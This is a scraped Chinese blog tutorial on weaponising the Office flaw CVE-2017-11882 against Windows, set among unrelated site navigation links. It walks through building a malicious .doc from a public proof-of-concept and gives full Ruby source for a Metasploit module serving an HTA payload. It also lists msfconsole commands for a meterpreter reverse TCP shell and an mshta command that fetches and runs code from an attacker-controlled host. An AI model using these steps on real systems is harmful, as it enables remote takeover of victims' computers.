当前位置: 首页 > news >正文

国内四大门户网站山东省建筑工程信息网

国内四大门户网站,山东省建筑工程信息网,佛山网红打卡地,台州企业建站程序环境#xff1a; kali系统#xff0c; windows系统 流程#xff1a; 在kali系统生成利用文件#xff0c; kali系统下监听本地端口#xff0c; windows系统打开doc文件#xff0c;即可中招 第一种利用方式#xff0c; 适合测试用#xff1a; 从git下载代码#xff1a; …  环境   kali系统 windows系统   流程   在kali系统生成利用文件 kali系统下监听本地端口 windows系统打开doc文件即可中招      第一种利用方式 适合测试用     从git下载代码 git clone https://github.com/Ridter/CVE-2017-11882     执行以下代码 会在当前目录生成一个doc python Command_CVE-2017-11882.py -c cmd.exe /c calc.exe -o test.doc     会生成一个test.doc文件 如果有漏洞的电脑打开这个文件 就会弹出一个计算器   第二种利用方式 反弹获得shell   kali系统准备   复制以下ruby代码到/usr/share/metasploit-framework/modules/exploits/windows/smb/cve_2017_11882.rb目录要注意代码缩进哦 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##class MetasploitModule Msf::Exploit::RemoteRank NormalRankinginclude Msf::Exploit::Remote::HttpServerdef initialize(info {})super(update_info(info,Name Microsoft Office Payload Delivery,Description %q{This module generates an command to place withina word document, that when executed, will retrieve a HTA payloadvia HTTP from an web server. Currently have not figured out howto generate a doc.},License MSF_LICENSE,Arch ARCH_X86,Platform win,Targets [[Automatic, {} ],],DefaultTarget 0,))enddef on_request_uri(cli, _request)print_status(Delivering payload)p regenerate_payload(cli)data Msf::Util::EXE.to_executable_fmt(framework,ARCH_X86,win,p.encoded,hta-psh,{ :arch ARCH_X86, :platform win })send_response(cli, data, Content-Type application/hta)enddef primerurl get_uriprint_status(Place the following DDE in an MS document:)print_line(mshta.exe \#{url}\)end end在命令行启动msf的服务 service postgresql start   再启动msf sudo msfconsole   重新加载所有模块 reload_all   查找我们刚刚新建的cve_2017_11882模块 search cve_2017_11882   加载这个模块 use exploit/windows/smb/cve_2017_11882   使用反弹shellcode 配置本机地址,  配置uri地址 set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.105 set uripath aaaa exploit   生成漏洞利用文件test1.doc   实现使用ifconfig查到当前计算机IP然后在clone下来的项目下执行以下命令 当前系统下回生成一个test1.doc文件 python Command109b_CVE-2017-11882.py -c mshta http://192.168.0.108/aaaa -o test1.doc   注意aaaa这个名字和msf的 uripath是一样的 不能乱写   把生成的test1.doc 放到window系统执行 msf就会返回一个shell   相关资源   POC的项目地址https://github.com/Ridter/CVE-2017-11882/   python Command_CVE-2017-11882.py -c cmd.exe /c calc.exe -o test.doc 作者 NONO 出处http://www.cnblogs.com/diligenceday/ 企业网站http://www.idrwl.com/ 开源博客http://www.github.com/sqqihaoQQ287101329 微信18101055830
http://wiki.neutronadmin.com/news/57493/

相关文章:

  • php 网站国家企业信息系统公示系统下载
  • 网页网站怎么做的山东德州最大的网站建设教学
  • 沈阳建设局网站首页百度关键词推广一年多少钱
  • 坦洲网站建设公司哪家好做排行榜的网站
  • 从化网站建设服务html网页设计作业代码
  • 苏州专业做网站较好的公司有哪些视频网站logo怎么做的
  • 定制网站建设简介信阳网站建设公司
  • 网站信息平台建设方案钟表玻璃东莞网站建设
  • 社区微网站建设方案提供网络推广服务
  • 酷站官网庐山市建设规划局网站
  • ajax+jsp网站开发从入门到精通彩票网站有人做吗
  • 常州商城网站制作公司wordpress shopme
  • 免费发布网站建设的平台软件开发三个主要阶段
  • 外贸网站建站平台seo怎么优化排名
  • 有哪些电商网站wordpress 滑块插件
  • 模拟炒股网站开发开发门户网站多少钱
  • 空间主机 建网站content index for wordpress
  • 立水桥网站建设网站被抄袭怎么投诉
  • 郓城菏泽网站建设上海网站建设开发
  • 昆明建网站的公司wordpress每篇文章加水印
  • 百度搜索官方网站2023新闻头条最新消息今天
  • 学技能的免费网站开发者选项在哪里打开
  • 杭州网站建设教育机构没域名 打开网站
  • 杭州网站排名提升专业的企业宣传片制作企业
  • 海康打开网站显示建设中rss网站推广法
  • 趣php网站开发实战代码制作网站接单
  • 门户型网站网店营销推广策略
  • 临沧网站建设网站设计西安学习
  • 建设一个网站的基本步骤网站的毕业设计怎么做
  • 灯具网站建设门户网站建设需求模板